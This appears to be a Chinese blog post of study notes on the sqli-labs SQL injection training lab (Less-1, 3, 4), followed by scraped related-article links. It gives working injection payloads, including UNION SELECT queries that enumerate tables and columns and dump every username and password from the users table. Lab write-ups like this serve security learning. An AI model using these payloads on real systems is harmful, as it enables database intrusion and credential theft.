0x01.less1

id=1/ id=1 and 1=1结果正常

id=1 and 1=2结果正常,不合理

id=1'提示:

分析:

use near '   '   1'   ' LIMIT 0,1    '

所以正确sql语句 为:

select username,password from table where id='input'

所以:

id = 1' and '1'='1

结果正确

即:

select username,password from table where id='1' and '1'='1'

或者:

id = 1' and 1=1 --+

结果正确

即:

select username,password from table where id='1' and 1=1 --+'

0x02.less03

输入:

http://127.0.0.1/Sqli-Labs/Less-3/?id=1 and 1=2

得到:

所以存在sql注入漏洞

于是输入:

id=1'得到提示:

near '      '     1'     ') LIMIT 0,1      ' at line 1

所以 猜测sql语句为:

select username,password from table where id = ('input')

所以注入语句可以是:

id=1') and  ('1'='1

即:select username,password from table where id = ('1') and  ('1'='1')

注入成功

或者:

id=1') and 1=1 --+

即:select username,password from table where id = ('1') and 1=1 --+')

注入成功

0x04.less4

注入语句:

http://127.0.0.1/Sqli-Labs/Less-4/?id=1") and 1=2 --+

或者:

http://127.0.0.1/Sqli-Labs/Less-4/?id=(1" and "1=2

测试:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=1") order by 3 --+
字段为3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,2,3 --+

可以利用的字段为2,3

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' --+

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,table_name,3 from information_schema.tables where table_schema='secu
rity' limit 3,1 --+

第4个表名:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='secu
rity' --+

4 个表名全部显示 :

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

显示列名:

http://127.0.0.1/Sqli-Labs/Less-4/
?id=-1") union select 1,group_concat(username,password),3 from users --+

显示users表里所有的用户名和密码:

sqli-labs less1 &&less3&&less4学习心得的更多相关文章

  1. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  2. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  3. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  4. 我的MYSQL学习心得(一) 简单语法

    我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  5. 我的MYSQL学习心得(二) 数据类型宽度

    我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  6. 我的MYSQL学习心得(三) 查看字段长度

    我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(五) 运 ...

  7. 我的MYSQL学习心得(四) 数据类型

    我的MYSQL学习心得(四) 数据类型 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(五) 运 ...

  8. 我的MYSQL学习心得(五) 运算符

    我的MYSQL学习心得(五) 运算符 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据 ...

  9. 我的MYSQL学习心得(六) 函数

    我的MYSQL学习心得(六) 函数 我的MYSQL学习心得(一) 简单语法 我的MYSQL学习心得(二) 数据类型宽度 我的MYSQL学习心得(三) 查看字段长度 我的MYSQL学习心得(四) 数据类 ...

随机推荐

  1. 067 Add Binary 二进制求和

    给定两个二进制字符串,返回他们的和(用二进制表示).案例:a = "11"b = "1"返回 "100" .详见:https://leetc ...

  2. SpringMVC简介01

    SpringMVC也叫Spring Web mvc,属于表现层的框架.SpringMVC是Spring框架的一部分,是在Spring3.0后发布的. Spring结构图: SpringMVC架构: S ...

  3. 1g免费空间永久使用

    云邦互联免费空间(免备案,无广告) [1G免费全能空间,免备案,无广告] 1G全能空间 + 100M数据库(Mysql 5.5 / SQL Server 2005) 支持的脚本:ASP.PHP(5.2 ...

  4. Collection-Iterator-foreach

    一.Collection(java.util) 1.概述:具有相同性质的一类事物的汇聚的整体,称为集合.任何集合都包含三块内容:对外的接口/接口的实现/对集合运算的算法.         java中使 ...

  5. Jquery 日期差函数 修改 对火狐进行兼容

    function DateDiff(sDate1, sDate2) { //sDate1和sDate2是yyyy-MM-dd格式 var aDate, oDate1, oDate2, iDays; a ...

  6. LibreOJ #515. 「LibreOJ β Round #2」贪心只能过样例

    题目描述 一共有 nnn个数,第 iii 个数 xix_ix​i​​ 可以取 [ai,bi][a_i , b_i][a​i​​,b​i​​] 中任意值.设 S=∑xi2S = \sum{{x_i}^2 ...

  7. Page_Load与sender -- PostBack是由哪个 ASP.NET控件引起 ?

    Page_Load与sender -- PostBack是由哪个 ASP.NET控件引起 ? 之前有讨论过ASP.NET Web Form "事件"里面的 "sender ...

  8. 如何将SAP Multi Target应用部署到SAP云平台的Cloud Foundry环境去

    SHINA是SAP HANA Interactive Education的缩写,是一个demo应用,用于演示如何开发SAP HANA原生应用. 这个应用包含了sample数据以及HANA数据库表,vi ...

  9. 【Orange Pi Lite2】 ——1《如何开始使用开源硬件》

    [Orange Pi Lite2] --1<如何开始使用开源硬件> 本文只在博客园发布 在开始前你需要准备的材料与软件 用户手册_Orange Pi Lite2 OrangePi_Lite ...

  10. HTTP 错误 404.15 - Not Found请求筛选模块被配置为拒绝包含的查询字符串过长的请求

    web项目中,get方式传值是通过地址栏中的url参数进行传递的.除了浏览器对url长度的限制大小不一之外,出于安全考虑, IIS中对于URL中参数大小也是有限制的,默认为2048KB. 如果参数大于 ...